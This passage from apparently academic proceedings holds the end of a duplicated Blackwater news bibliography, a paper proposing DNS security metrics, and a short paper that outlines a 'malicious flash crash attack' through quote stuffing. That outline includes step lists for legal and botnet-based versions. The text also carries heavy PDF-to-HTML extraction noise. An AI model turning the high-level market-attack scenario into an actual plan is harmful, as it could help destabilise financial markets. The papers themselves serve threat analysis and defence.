The New York Times, news article: “Hired Gun Fetish”, Paul Krugman, 28.09.2007.<br />
The New York Times, news article: “S<strong>in</strong>k<strong>in</strong>g <strong>in</strong> a Swamp Full of Blackwater”, Maureen Dowd, 03.10.2007.<br />
The New York Times, editorials<br />
The New York Times, news article: “Subcontract<strong>in</strong>g the War”, 01.10.2007.<br />
The New York Times, news article: “Blackwater’s Rich Contracts”, 03.10.2007.<br />
The New York Times, news article: “Iraqi Report Says Guards for Blackwater Fired First”, 19.09.2007.<br />
The New York Times, news article: “Maliki Alleges 7 Cases When Blackwater Killed Iraqis”, 20.09.2007a.<br />
The New York Times, news article “Armed Guards <strong>in</strong> Iraq Occupy a Legal Limbo”, 20.09.2007b.<br />
The New York Times, news article “Guards’ Shots Not Provoked, Iraq Concludes”, 21.09.2007.<br />
The New York Times, news article “Blackwater Resumes Guard<strong>in</strong>g U.S. Envoys <strong>in</strong> Iraq”, 22.09.2007.<br />
The New York Times, news article “<strong>Security</strong> Firm Faces Crim<strong>in</strong>al Charges <strong>in</strong> Iraq”, 23.09.2007.<br />
The New York Times, news article “Iraqi Premier Says Blackwater Shoot<strong>in</strong>gs Challenge His Nation’s Sovereignty”,<br />
24.09.2007.<br />
The New York Times, news article “House Panel and State Dept. Clash on Blackwater Inquiry”, 26.09.2007a.<br />
The New York Times, news article “Iraq Drafts Law on <strong>Security</strong> Companies”, 26.09.2006b.<br />
The New York Times, news article “Blackwater Tops All Firms <strong>in</strong> Iraq <strong>in</strong> Shoot<strong>in</strong>g Rate”, 27.09.2007.<br />
The New York Times, news article “State Dept. Tallies 56 Shoot<strong>in</strong>gs Involv<strong>in</strong>g Blackwater on Diplomatic Guard Duty”,<br />
28.09.2007a.<br />
The New York Times, news article “Blackwater Role <strong>in</strong> Shoot<strong>in</strong>g Said to Include Chaos”, 28.09.2007b.<br />
The New York Times, news article “State Dept. Starts Third Review on Private <strong>Security</strong> <strong>in</strong> Iraq”, 29.09.2007.<br />
The New York Times, news article “Report Says Firm Tried Cover-ups After Shoot<strong>in</strong>gs”, 02.10.2007.<br />
The New York Times, news article “Chief of Blackwater Defends His Employees”, 03.10.2007a.<br />
The New York Times, news article “From Errand to Fatal Shot to Hail of Fire to 17 Deaths”, 03.10.2007b.<br />
The New York Times, news article The New York Times, op-ed columnists<br />
The New York Times, news article “Hired Gun Fetish”, Paul Krugman, 28.09.2007.<br />
The New York Times, news article “S<strong>in</strong>k<strong>in</strong>g <strong>in</strong> a Swamp Full of Blackwater”, Maureen Dowd, 03.10.2007.<br />
The New York Times, editorials<br />
The New York Times, news article “Subcontract<strong>in</strong>g the War”, 01.10.2007.<br />
The New York Times, news article “Blackwater’s Rich Contracts”, 03.10.2007.<br />
329
330
Non<br />
<strong>Academic</strong><br />
Papers<br />
331
332
A Proposal for Doma<strong>in</strong> Name System (DNS) <strong>Security</strong> Metrics<br />
Framework<br />
Andrea Rigoni and Salvatore Di Blasi<br />
Global Cyber <strong>Security</strong> Center, Rome, Italy<br />
andrea.rigoni@gcsec.org<br />
salvatore.diblasi@gcsec.org<br />
Abstract: The Doma<strong>in</strong> Name System (DNS) is a fundamental and critical build<strong>in</strong>g block of the Internet. Not only,<br />
DNS represents one of the most critical services of <strong>in</strong>formation <strong>in</strong>frastructures, and the strong <strong>in</strong>terdependency<br />
between critical <strong>in</strong>frastructures rely<strong>in</strong>g on <strong>in</strong>formation and communication technology makes DNS a likely, disrupt<strong>in</strong>g<br />
target <strong>in</strong> case of cyber conflict. Critical <strong>in</strong>frastructures are no longer <strong>in</strong>dependent from the Internet networks:<br />
electricity plants, telecommunications services, transportation systems, banks and f<strong>in</strong>ancial <strong>in</strong>stitutions heavily rely<br />
on Information and Communication Technology (ICT). New risk scenarios for critical <strong>in</strong>frastructure protection are<br />
expected, <strong>in</strong> that newer threats propagate through the Internet networks and exploit Internet <strong>in</strong>frastructure<br />
vulnerabilities, mak<strong>in</strong>g such threats as cyber espionage, cyber conflict and cyber terrorism a likely possibility every<br />
government should consider <strong>in</strong> its national security agenda. DNS is vulnerable to a series of threat agents, and these<br />
vulnerabilities might be exploited by coord<strong>in</strong>ated groups of attackers to produce damages to national critical assets.<br />
A more secure DNS <strong>in</strong> terms of technology, processes, policy mak<strong>in</strong>g and organizational structures is needed. The<br />
proposal presented <strong>in</strong> this paper represents a work <strong>in</strong> progress, whose ma<strong>in</strong> objective consists <strong>in</strong> the development of<br />
an accepted metric framework for DNS security and stability: this will be accomplished through a deep state-of-theart<br />
analysis of current DNS metrics and KPIs, the proposal of a newer set of KPIs and consequential shar<strong>in</strong>g of the<br />
results with the DNS community. We believe the def<strong>in</strong>ition and collection of these metrics will pave the way to the<br />
empirical def<strong>in</strong>ition of a DNS stability basel<strong>in</strong>e, lead<strong>in</strong>g to the establishment of best practices, standards and<br />
acceptable service levels for a consolidated overarch<strong>in</strong>g DNS security policy mak<strong>in</strong>g framework and rais<strong>in</strong>g<br />
awareness on DNS vulnerabilities and threats outside DNS community.<br />
Keywords: DNS security, security policy, public key <strong>in</strong>frastructure, security, critical national <strong>in</strong>frastructure protection<br />
1. DNS and critical (<strong>in</strong>formation) <strong>in</strong>frastructure protection<br />
DNS security and stability (i.e. a guaranteed level of accuracy, performance and dependability) have a<br />
direct and strong impact on the performance and dependability of nearly all Internet services and<br />
applications, which constitute a foundation for high performance and scalable services comput<strong>in</strong>g,<br />
<strong>in</strong>creas<strong>in</strong>g requirements for higher performance and availability.<br />
Critical <strong>in</strong>frastructures are no longer <strong>in</strong>dependent from the Internet networks: electricity plants,<br />
telecommunications services, transportation systems, banks and f<strong>in</strong>ancial <strong>in</strong>stitutions heavily rely on<br />
Information and Communication Technology (ICT); moreover, corporate networks of critical sectors<br />
operators are often <strong>in</strong>terconnected with <strong>in</strong>ternal control and monitor<strong>in</strong>g systems, <strong>in</strong> order to make data<br />
available for bus<strong>in</strong>ess <strong>in</strong>telligence needs.<br />
This draws new risk scenarios <strong>in</strong> that newer threats propagate through the Internet networks and exploit<br />
Internet <strong>in</strong>frastructure vulnerabilities, mak<strong>in</strong>g such threats as cyber conflict a likely possibility for any<br />
government.<br />
DNS, along with rout<strong>in</strong>g protocols, constitutes the core function<strong>in</strong>g service of the Internet <strong>in</strong>frastructure<br />
and with the adoption of new <strong>in</strong>ternet <strong>in</strong>frastructures technologies, such as IPv6, the need for DNS<br />
security and stability can be considered an even more critical goal affect<strong>in</strong>g the whole cyber community.<br />
2. DNS security issues and possible solutions<br />
As one of the first developed systems for the <strong>in</strong>ternet <strong>in</strong>frastructure, DNS has been designed to be<br />
perform<strong>in</strong>g and scalable rather than secure.<br />
Nowadays, three major categories of vulnerabilities have been identified for DNS: operat<strong>in</strong>g<br />
vulnerabilities, process vulnerabilities and policy vulnerabilities.<br />
DNS is susceptible of operat<strong>in</strong>g vulnerabilities which can underm<strong>in</strong>e its availability, through Denial of<br />
Service (Dos) and Distributed Denial of Service(DDoS) attacks, and <strong>in</strong>tegrity, via spoof<strong>in</strong>g and man-<strong>in</strong>the-middle<br />
attacks, which can lead to cache poison<strong>in</strong>g and more generally forged responses to client<br />
333
Andrea Rigoni and Salvatore Di Blasi<br />
resolvers. Root operators, Country Code Top Level Doma<strong>in</strong>s (ccTLD) and General Top Level Doma<strong>in</strong>s<br />
(gTLD) operators have often been targets for this k<strong>in</strong>d of attacks <strong>in</strong> the recent past.<br />
DNS registration services have been found as an advantageous entry-po<strong>in</strong>t for phish<strong>in</strong>g campaigns and<br />
botnet <strong>in</strong>frastructures.<br />
Last but not least, DNS core functions are operated through the contributions of root server operators,<br />
TLD registries and registrars: these entities operate with<strong>in</strong> their own def<strong>in</strong>ed policy frameworks and don’t<br />
have any specific obligations and liabilities whenever disruptions or impossibility to perform their<br />
functions should happen.<br />
DNS <strong>Security</strong> Extensions (DNSSEC) has been <strong>in</strong>troduced as a security extension to the DNS protocol,<br />
f<strong>in</strong>ally provid<strong>in</strong>g authentication and <strong>in</strong>tegrity assurance for DNS data through <strong>in</strong>troduced cryptographic<br />
mechanisms which allow to sign DNS records.<br />
Despite of the commitment of the DNS community <strong>in</strong> gradually adopt<strong>in</strong>g DNSSEC, there are some open<br />
challenges which have yet to be addressed:<br />
DNSSEC could still be vulnerable to replay attacks due to misconfigured sett<strong>in</strong>gs on timestamps<br />
validity for signatures and their relative cached counterparts;<br />
there still exists some open issues on Public Key Infrastructure (PKI) processes, <strong>in</strong> particular<br />
regard<strong>in</strong>g DNS keys lifetime, rollover and verification, especially if consider<strong>in</strong>g the <strong>in</strong>teraction<br />
between DNSSEC-served zones and standard DNS zones;<br />
a lack of customer demand and miss<strong>in</strong>g DNSSEC expertise constitute imped<strong>in</strong>g factors for DNSSEC<br />
wide adoption;<br />
There is a general understand<strong>in</strong>g with<strong>in</strong> DNS community that an overarch<strong>in</strong>g collaboration framework<br />
is needed, <strong>in</strong> order to guarantee dedicated organizational structures and agreed upon DNS security<br />
policies.<br />
DNS is vulnerable to a series of targeted threat agents, and these vulnerabilities might be likely exploited<br />
by coord<strong>in</strong>ated groups of attackers to produce damages to national critical assets.<br />
To give an example, successful attacks produc<strong>in</strong>g forged DNS responses can redirect users’ requests<br />
towards <strong>in</strong>fected sites, thus allow<strong>in</strong>g the attackers to <strong>in</strong>stall malware applications on the user mach<strong>in</strong>es<br />
and then propagate through enterprise networks, exploit<strong>in</strong>g misconfigured firewalls, Intrusion Detection<br />
Systems (IDS) and Intrusion Prevention Systems (IPS) and operat<strong>in</strong>g systems vulnerabilities.<br />
This is critical <strong>in</strong> case of propagation between corporate Local Area Networks (LAN) and <strong>in</strong>ternal control<br />
systems of electricity plants or nuclear facilities: the Stuxnet operation, though not produc<strong>in</strong>g physical<br />
damages or life losses, proved capable to control and alter the behavior of s<strong>in</strong>gle field devices; the next<br />
step when electricity, water supply, oil and gas operators, bank<strong>in</strong>g <strong>in</strong>stitutions, transportation control<br />
systems, telecommunication and public health services will be affected is not necessarily that far.<br />
It becomes thus evident that, <strong>in</strong> order to improve the security, stability and resiliency of the DNS, there is<br />
a need for:<br />
Dedicated activities to def<strong>in</strong>e consolidated processes for DNS Public Key Infrastructure (PKI)<br />
Def<strong>in</strong>ition and consolidation of standards, system-wide metrics and acceptable service levels<br />
A large-scale simulation framework to help DNS eng<strong>in</strong>eer<strong>in</strong>g <strong>in</strong> what-if and impact analysis of risk<br />
scenarios<br />
Def<strong>in</strong>ition of a framework for <strong>in</strong>formation shar<strong>in</strong>g among DNS ecosystem players<br />
DNSSEC capacity build<strong>in</strong>g activities, dissem<strong>in</strong>ation and tra<strong>in</strong><strong>in</strong>g for <strong>in</strong>volved operators<br />
3. Our proposal: A DNS security metrics framework<br />
In DNS literature there are numerous studies that characterize DNS traffic (Castro, Wessels, Fomenkov,<br />
Claffy 2008; DNS-OARC 2006) and are specifically focused on the performance of the DNS (Ager,<br />
Dreger, Feldmann 2006; Ager, Mühlbauer, Smaragdakis, Uhlig 2010; Huang, Holt, Wang, Greenberg, J<strong>in</strong><br />
Li, Ross 2010; Jung, Sit, Balakrishnan, Morris 2002; Kolkman 2005; Liston, Sr<strong>in</strong>ivasan, Zegura 2002).<br />
These research results build a base of knowledge for DNS eng<strong>in</strong>eers <strong>in</strong>volved <strong>in</strong> the design of solutions<br />
334
Andrea Rigoni and Salvatore Di Blasi<br />
to improve DNS performance and scalability. Such studies can also provide a knowledge base for DNS<br />
policy mak<strong>in</strong>g.<br />
The fast and frequently unpredictable evolution of Internet applications and technologies has a direct<br />
impact on the rapid growth of Internet service demand. This growth necessitates up-to-date and on-go<strong>in</strong>g<br />
research and benchmark<strong>in</strong>g of DNS security and stability.<br />
To achieve the goal of understand<strong>in</strong>g and benchmark<strong>in</strong>g DNS security and stability, it is fundamental to<br />
develop new and standard metrics for what stability of the DNS actually means. While the DNS system<br />
has operated <strong>in</strong> a generally reliable and robust fashion for decades, this notion of stability is not<br />
empirically specified, and no way currently exists to specifically assess the stability impacts of<br />
application-driven query volume <strong>in</strong>creases, or technology changes such as DNSSEC. Various studies<br />
(Ager, Dreger, Feldmann 2006; CommunityDNS 2010; Kolkman 2005) have assessed the specific<br />
response to payload <strong>in</strong>creases, but these studies have not provided the ability to correlate the results<br />
with system-wide stability metrics.<br />
The goal of this proposed study is to create a set of metrics that establish a basel<strong>in</strong>e for DNS stability and<br />
security by:<br />
Perform<strong>in</strong>g a state-of-the-art study of measurement techniques and metrics used <strong>in</strong> DNS stability and<br />
security evaluation as well as <strong>in</strong> DNS policy mak<strong>in</strong>g;<br />
Compar<strong>in</strong>g the effectiveness of exist<strong>in</strong>g metrics and Key Performance Indicators (KPI) <strong>in</strong> relation to<br />
real data;<br />
Identify<strong>in</strong>g and propos<strong>in</strong>g for standardization a modular/layered framework of measurement<br />
techniques, metrics and KPIs to support the design, eng<strong>in</strong>eer<strong>in</strong>g and governance of the DNS<br />
<strong>in</strong>frastructure;<br />
Ensur<strong>in</strong>g transparency with respect to DNS research community <strong>in</strong> <strong>in</strong>spect<strong>in</strong>g the measurement data,<br />
challeng<strong>in</strong>g any results, and build<strong>in</strong>g further analyses.<br />
4. Expected outcomes and benefits<br />
We believe that the def<strong>in</strong>ition and collection of these metrics will pave the way to the empirical def<strong>in</strong>ition<br />
of a DNS stability basel<strong>in</strong>e.<br />
While foster<strong>in</strong>g a stronger debate about overall systemic def<strong>in</strong>ition of stability, this quantitative basel<strong>in</strong>e<br />
will establish an important benchmark, sett<strong>in</strong>g up the basis for the def<strong>in</strong>ition of a framework for DNS<br />
benchmark<strong>in</strong>g and consistent DNS traffic trend analysis.<br />
Cooperation with DNS community is fundamental to atta<strong>in</strong> a global and cross-border scope for the<br />
research activities.<br />
We envisage this will also help to lead to the establishment of standards and acceptable service levels<br />
for a consolidated overarch<strong>in</strong>g DNS security policy mak<strong>in</strong>g framework.<br />
In this way, the debate will open up to new research opportunities for academic partners, <strong>in</strong>ternational<br />
standard bodies, <strong>in</strong>ternet governance organizations, DNS operators, vendors and researchers.<br />
5. Conclusions<br />
The Internet constitutes a critical <strong>in</strong>frastructure on its own; at its core function<strong>in</strong>g, DNS security<br />
represents a global issue <strong>in</strong> the Internet ecosystem.<br />
In the age of cyber warfare, <strong>in</strong>ternational debate is open about the applicability of <strong>in</strong>ternational<br />
humanitarian law <strong>in</strong> case of cyber conflict: <strong>in</strong> order to preserve and protect core humanitarian services<br />
such as telecommunications and emergencies <strong>in</strong> case of cyber conflict, it would be needful to promote<br />
studies and analysis over DNS security as a critical <strong>in</strong>ternet service, <strong>in</strong> order to eventually put <strong>in</strong> place a<br />
framework of policies and organizational structures to guarantee better DNS security, stability and<br />
resiliency.<br />
A consolidated security metrics framework for DNS will help to start gett<strong>in</strong>g a big picture of the DNS<br />
health status, identify<strong>in</strong>g major issues and vulnerabilities as well as sett<strong>in</strong>g new policies: by hav<strong>in</strong>g <strong>in</strong><br />
335
Andrea Rigoni and Salvatore Di Blasi<br />
place def<strong>in</strong>ed metrics, it will be possible to perform more <strong>in</strong>tensive simulation-driven predictive analysis of<br />
security impact of DNS over critical <strong>in</strong>frastructure services.<br />
As a core service of the Internet <strong>in</strong>frastructure, DNS would likely be an attack target should a cyber<br />
conflict occurr, and this is the ma<strong>in</strong> reason why we believe it is fundamental to put <strong>in</strong> place solid defense<br />
mechanisms for its protection.<br />
References<br />
Ager B., Dreger H., Feldmann A. (2006) “Predict<strong>in</strong>g the DNSSEC overhead us<strong>in</strong>g DNS traces”, IEEE ISS 2006<br />
Ager B., Mühlbauer W., Smaragdakis G., Uhlig S. (2010) “Compar<strong>in</strong>g DNS Resolvers <strong>in</strong> the Wild”, Proceed<strong>in</strong>gs of<br />
Internet Measurement Conference January 2011<br />
Castro S., Wessels D., Fomenkov M., Claffy K. (2008) “A day at the root of the <strong>in</strong>ternet”, SIGCOMM Comput.<br />
Commun. Rev. 38, 5 pp41-46<br />
CommunityDNS, (2010) “Performance test<strong>in</strong>g of BIND, NSD and CDNS platforms on identical hardware”<br />
DNS-OARC “The Day <strong>in</strong> the life of Internet (DITL) project”<br />
Huang C., Holt N., Wang Y.A., Greenberg A., J<strong>in</strong> Li, Ross K.W. (2010), “A DNS reflection method for global traffic<br />
management”, Proceed<strong>in</strong>gs of the 2010 USENIX conference on USENIX annual technical conference (USENIX<br />
ATC'10). USENIX Association, Berkeley, CA, USA, 20-20<br />
Jung J., Sit E., Balakrishnan H., Morris R. (2002) “DNS performance and the effectiveness of cach<strong>in</strong>g”, IEEE/ACM<br />
Trans. Netw. 10, pp589-603<br />
Kolkman O.M. (2005), “Measur<strong>in</strong>g the resource requirements of DNSSEC”, RIPE NCC Tech. Report RIPE-352<br />
Liston R., Sr<strong>in</strong>ivasan S., Zegura E. (2002) “Diversity <strong>in</strong> DNS performance measures”, Proceed<strong>in</strong>gs of the 2nd ACM<br />
SIGCOMM Workshop on Internet measurment (IMW '02). ACM, New York, NY, USA, pp 19-31.<br />
336
Work<br />
<strong>in</strong><br />
Progress<br />
337
338
Malicious Flash Crash Attacks by Quote Stuff<strong>in</strong>g: This is the<br />
way the (F<strong>in</strong>ancial) World Could end<br />
Robert Erra<br />
Équipe S&IS, Esiea Paris, France<br />
erra@esiea.fr<br />
Abstract: Cybercrime and cyberterrorism use computers (well, softwares and networks) to attack targets like critical<br />
<strong>in</strong>frastructures. Computers, softwares and networks are necessary tools for a cyberattack but can also of course be<br />
targets. We propose here to describe a new form of cyberterrorism (or cybercrime) attack, theoretical but with a high<br />
probability of realization: the cyberattack on the stock exchange market of some countries but with legal<br />
cyberweapons. Consequences of such an attack could be devastat<strong>in</strong>g for the f<strong>in</strong>ancial and the non f<strong>in</strong>ancial world.<br />
How is such an attack possible ? Well, at the New York Stock Exchange, May 6th 2010, an astonish<strong>in</strong>g fact has<br />
happened: all f<strong>in</strong>ancial transactions dur<strong>in</strong>g 20 m<strong>in</strong>utes have been purely “deleted”. This is now called the Flash<br />
Crash. All details are not clearly understood, it seems that the so called “quote stuff<strong>in</strong>g” (or stub quotes sometimes)<br />
used <strong>in</strong> conjunction with High Frequency Trad<strong>in</strong>g (HTF) is at the heart of this accidental <strong>in</strong>cident. We have to po<strong>in</strong>t<br />
out that experts from SEC do not agree with this hypothesis. We propose <strong>in</strong> this paper here to describe a malicious<br />
version of the flash crash, this is a new cyberweapon that can attack a new target: Stock Exchanges places. More<br />
precisely, we propose to see this f<strong>in</strong>ancial <strong>in</strong>cident as it really is : a Denial Of Services (DOS) of a very new type that<br />
we will call a Denial Of F<strong>in</strong>ancial Services (DFOS). We rem<strong>in</strong>d that a DOS classical attack is simple to do and can be<br />
devastat<strong>in</strong>g, so it seems for the DFOS. The basic idea of the scenario of our malicious flash crash attack (MFCA) is<br />
simple: we propose to mimic the true flash crash of the New York Stock Exchange. So, a group of cyberterrorists,<br />
with just money and computers, follow<strong>in</strong>g the mechanisms of the MFCA, could create an artificial but truly<br />
devastat<strong>in</strong>g flash crash. An quick evaluation of the legality of each step of our malicious flash crash attack shows that<br />
if the quote stuff<strong>in</strong>g is considered as legal (the status of it is a little bit unclear) then the MFCA is absolutely legal. We<br />
propose also a illegal version of the MFCA. Is it possible to design a countermeasure aga<strong>in</strong>st the MFCA ?<br />
Unfortunately, as long as HTF and quote stuff<strong>in</strong>g will be legal, our scenarii are highly plausible, both the legal and the<br />
illegal version, and they are not so difficult if you have enough money, or enough cybercrim<strong>in</strong>als.<br />
Keywords: flash crash, quote stuff<strong>in</strong>g, cyberwarfare, cyberterrorism, cyberattack<br />
1. Introduction<br />
Cyberwarfare, cyberterrorism and cybercrime are not so old terms and a lot of def<strong>in</strong>itions have been<br />
given for these terms. We just rem<strong>in</strong>d the “FBI” def<strong>in</strong>ition of cyberterrorism (UDA 2009) which has been<br />
first proposed by M. Pollit <strong>in</strong> 1998: “… any premeditated, politically motivated attack aga<strong>in</strong>st <strong>in</strong>formation,<br />
computer systems, computer programs, and data which results <strong>in</strong> violence aga<strong>in</strong>st non-combatant targets<br />
by sub-national or national groups or clandest<strong>in</strong>e agents”.<br />
Computers, softwares and networks are necessary tools for a cyberattack but can also of course be<br />
targets (Filiol 2009).<br />
So, is a cyberattack on the stock exchange market of some countries a form of cyberterrorism? This<br />
question (UDA 2009) has a complex answer; we give here just a quick answer: yes!<br />
We propose a new scenario, theoretical but with a high probability of realization.<br />
The targets are stock exchanges places and, through them, companies, especially f<strong>in</strong>ancial companies<br />
that try to do profits only by “play<strong>in</strong>g” with f<strong>in</strong>ancial softwares. Of course, consequences of such an attack<br />
could be devastat<strong>in</strong>g for the f<strong>in</strong>ancial world and, of course, unfortunately also for the non f<strong>in</strong>ancial world.<br />
Our basic idea comes from the events at the New York Stock Exchange (NYSE), May 6th 2010. This day,<br />
an astonish<strong>in</strong>g fact has happened: quite all f<strong>in</strong>ancial transactions dur<strong>in</strong>g 20 mns have been purely<br />
“deleted”. This is now called the Flash Crash. All details are not clearly understood, the prelim<strong>in</strong>ary report<br />
(SEC 2010a) and the f<strong>in</strong>al report (SEC 2010b) published by the SEC about the flash crash gives a lot of<br />
details but no clear conv<strong>in</strong>c<strong>in</strong>g explanations of how to avoid <strong>in</strong> the future such a flash crash. It seems that<br />
the so called “quote stuff<strong>in</strong>g” used <strong>in</strong> High Frequency Trad<strong>in</strong>g (HTF) is at the heart of this accidental<br />
<strong>in</strong>cident.<br />
We propose <strong>in</strong> this paper to <strong>in</strong>vestigate possibilities to create a malicious version of the Flash Crash, that<br />
we will call the malicious flash crash attack (MFCA). This is a new cyberweapon that can attack a new<br />
target: stock exchanges places. More precisely, we propose to see this f<strong>in</strong>ancial <strong>in</strong>cident as it really is : a<br />
339
Robert Erra<br />
Denial Of Services (DOS) of a very new type that we will call a F<strong>in</strong>ancial Electronic Denial Of Services<br />
(FEDoS). We rem<strong>in</strong>d that a DOS classical attack is simple to do and can be devastat<strong>in</strong>g, so it seems for<br />
the FEDoS.<br />
The basic idea of the scenario of our MFCA is simple: we propose to mimic the true flash crash of the<br />
New York Stock Exchange. So, a group of cyberterrorists, with just money and computers, follow<strong>in</strong>g the<br />
mechanisms of the FCA, could create an artificial but truly devastat<strong>in</strong>g flash crash.<br />
We present here:<br />
A quick <strong>in</strong>vestigation of how such a event has happened<br />
Some arguments to show it is really possible to mime the flash crash to use it as a new weapon.<br />
An evaluation of the legality of each step of a malicious flash crash attack shows that if the quote stuff<strong>in</strong>g<br />
is considered as legal (the status of it is a little bit unclear) then the MFCA is absolutely legal. We will<br />
present an illegal version of the MFCA. As a conclusion we will propose some topics for future research<br />
on this new cyberattack which is by now a theoretical scenario but with a high probability of realization.<br />
For example: is it possible to design “signatures” for quote stuff<strong>in</strong>g techniques, like viruses and malwares<br />
signatures based on specific patterns and used by quite all antivirus softwares, to identify them <strong>in</strong> real<br />
time? This question has very close connections to questions studied <strong>in</strong> antivirology research.<br />
2. Some def<strong>in</strong>itions : High frequency trad<strong>in</strong>g and quote stuff<strong>in</strong>g<br />
Follow<strong>in</strong>g Aldridge (Aldridge 2009) and Wikipedia (Wikipedia 2011), High Frequency Trad<strong>in</strong>g (HTF) is the<br />
execution of computerized trad<strong>in</strong>g strategies characterized by unusually short position-hold<strong>in</strong>g periods.<br />
This is now possible because of the low cost of electronic trad<strong>in</strong>g. HFT uses quantitative <strong>in</strong>vestment<br />
softwares to hold short-term, or very short terms, positions <strong>in</strong> equities, options, futures, currencies, and<br />
other f<strong>in</strong>ancial <strong>in</strong>struments that possess electronic trad<strong>in</strong>g capability. HTF seems legal (SEC 2010a,<br />
2010b) and unfortunately quote stuff<strong>in</strong>g is also legal; What is quote stuff<strong>in</strong>g ? Generate a large number of<br />
orders and cancel quickly them (<strong>in</strong> a micro-seconds sometime), then you are do<strong>in</strong>g quote stuff<strong>in</strong>g. We<br />
propose a new def<strong>in</strong>ition for quote stuff<strong>in</strong>g: a F<strong>in</strong>ancial Electronic Denial of Service (FEDoS). This not so<br />
exaggerated; we can f<strong>in</strong>d for example <strong>in</strong> the Nanex’report : “… this is an extremely disturb<strong>in</strong>g<br />
development, because as more HFT systems start do<strong>in</strong>g this, it is only a matter of time before quotestuff<strong>in</strong>g<br />
shuts down the entire market from congestion”.<br />
3. The flash crash scenario<br />
The Flash Crash beg<strong>in</strong>s <strong>in</strong> the US Stock Exchange system at 14h 42mn 46s, May 6, 2010. Some<br />
software, follow<strong>in</strong>g the rules of the High Frequency Trad<strong>in</strong>g begun to do strange th<strong>in</strong>gs. In a few m<strong>in</strong>utes<br />
(SEC 2010a, SEC 2010b):<br />
Some quote counts have changed 5000 times <strong>in</strong> a second;<br />
Some trades were executed at prices of a penny (0.01$) or less like the Accenture Company;<br />
Some trades were executed at a price of 100 000 $.<br />
Eventually, after a few hours, an astonish<strong>in</strong>g fact has happened: quite all f<strong>in</strong>ancial transactions from<br />
14h40 to 15h have been purely “deleted”. This is now called the flash crash. All details are not clearly<br />
understood and the f<strong>in</strong>al SEC report 1 about the flash crash is still waited. It seems that the so called<br />
“quote stuff<strong>in</strong>g” is at the heart of this accidental <strong>in</strong>cident. May, 15 th 2010, SEC Chairman has said “we're<br />
outgunned by market supercomputers”. Technically this is not exactly true. The problems are HTF<br />
algorithms and the fact that quote stuff<strong>in</strong>g is not illegal at all.<br />
4. Two malicious flash crash attacks by quote stuff<strong>in</strong>g<br />
What do we need to conduct a malicious flash crash attack ? We nned Softwares for HTF, High Speed<br />
Networks, and money. We propose two scenarii: a legal one and an illegal one. Of course, we can<br />
imag<strong>in</strong>e a third scenario: a malicious flash crash attack partly legal and partly illegal. We have to po<strong>in</strong>t out<br />
1 An example of what we can f<strong>in</strong>d <strong>in</strong> (SEC 2010b) :<br />
“Still lack<strong>in</strong>g sufficient demand from fundamental buyers or cross-market arbitrageurs, HFTs<br />
began to quickly buy and then resell contracts to each other – generat<strong>in</strong>g a “hot-potato”<br />
volume effect as the same positions were rapidly passed back and forth. Between 2:45:13 and<br />
2:45:27, HFTs traded over 27,000 contracts, which accounted for about 49 percent of the total<br />
trad<strong>in</strong>g volume, while buy<strong>in</strong>g only about 200 additional contracts net.<br />
340
Robert Erra<br />
that if we present these scenarii as a cyberattack, it is possible to imag<strong>in</strong>e that someone, a<br />
cyberspeculator, could try such an attack only with the goal to w<strong>in</strong> money. This theoretical flash crash<br />
attack by quote stuff<strong>in</strong>g could really be a practical “F<strong>in</strong>ancial Weapon of Mass Destruction”. This f<strong>in</strong>ancial<br />
attack would still be cyberterrorism.<br />
4.1 The (legal) malicious flash crash attack<br />
We just propose to mimic the true scenario:<br />
Create some (legal and official) companies of HTF <strong>in</strong> different countries, seem<strong>in</strong>gly <strong>in</strong>dependent.<br />
Wait for some months or years, the companies really work.<br />
Wait for a “calm day” at NYSE, July 3 is a good candidate.<br />
Sent a lot of quote stuff<strong>in</strong>g orders, from all the companies just 5 seconds before the closure.<br />
It is difficult to estimate how much money is necessary to make such a scenario efficient, but it seems<br />
reasonable to say:<br />
With 100 million dollars: the scenario is possible, but highly difficult;<br />
With 1 billion dollars: the scenario is highly possible, less difficult ;<br />
With 10 billion dollars: we can do it without doubt.<br />
Unfortunately, HTF is legal, so we don’t see how this scenario could be stopped.<br />
4.2 The (illegal) malicious flash crash attack<br />
We can also imag<strong>in</strong>e the follow<strong>in</strong>g illegal scenario, forgett<strong>in</strong>g the creation of legal companies:<br />
Engage a team of experienced cybercrim<strong>in</strong>als.<br />
Ask them to take the control of the local networks of some HTF companies.<br />
Create a f<strong>in</strong>ancial botnet.<br />
Use the botnet to follow the legal scenario.<br />
HTF can really become a new “F<strong>in</strong>ancial Weapon of Massive Destruction”.<br />
5. Conclusion<br />
As long as HTF and quote stuff<strong>in</strong>g will be legal (SEC 20010a, 2010b), our two scenarii are highly<br />
plausible, both the legal and the illegal version, and they are not so difficult if you have enough money, or<br />
enough cybercrim<strong>in</strong>als. Is there a countermeasure aga<strong>in</strong>st malicious flash crack attacks ? Well, as long<br />
as HTF and quote stuff<strong>in</strong>g will be legal, it is difficult to imag<strong>in</strong>e such a countermeasure. If someday quote<br />
stuff<strong>in</strong>g becomes illegal then we could imag<strong>in</strong>e the follow<strong>in</strong>g question which is <strong>in</strong> itself a roadmap for<br />
future research: is it possible to design “signatures” for quote stuff<strong>in</strong>g techniques, like viruses and<br />
malware signatures based on specific patterns and used by quite all antivirus softwares, to identify them<br />
<strong>in</strong> real time? This difficult question has very close connections to questions studied <strong>in</strong> antivirology<br />
research. So, let us hope we will not need an antiHFT or antiquotestuff<strong>in</strong>g software.<br />
References<br />
Aldridge, I., (2009), High-Frequency Trad<strong>in</strong>g: A Practical Guide to Algorithmic Strategies and Trad<strong>in</strong>g Systems,<br />
Wiley.<br />
Nanex’s Report (2010) June 18, part 4, http://www.nanex.net/20100506/FlashCrashAnalysis_Part4-1.html<br />
Filiol, E. (2009) “Operational aspects of cyberwarfare or cyber-terrorism attacks: what a truly devastat<strong>in</strong>g attack could<br />
do”, ECIW 2009, Liboa, http://www.esiea-recherche.eu/data/eciw09.pdf<br />
SEC (2010a) Report of the staffs of the CFTC and SEC to the Jo<strong>in</strong>t Advisory Committee on Emerg<strong>in</strong>g Regulatory<br />
Issues, May 18,, http://www.sec.gov/sec-cftc-prelimreport.pdf<br />
SEC (2010b) Report of the staffs of the CFTC and SEC to the Jo<strong>in</strong>t Advisory Committee on Emerg<strong>in</strong>g Regulatory<br />
Issues, September 30, http://www.sec.gov/news/studies/2010/marketevents-report.pdf .<br />
Uda, 2009, R. T., Cybercrime, Cyberterrorims and Cyberwarfare, Crime, Terror and War without Conventional<br />
Weapons, Xlibris.<br />
Wikipedia (2011) “High-frequency trad<strong>in</strong>g”, http://en.wikipedia.org/wiki/High-frequency_trad<strong>in</strong>g<br />
341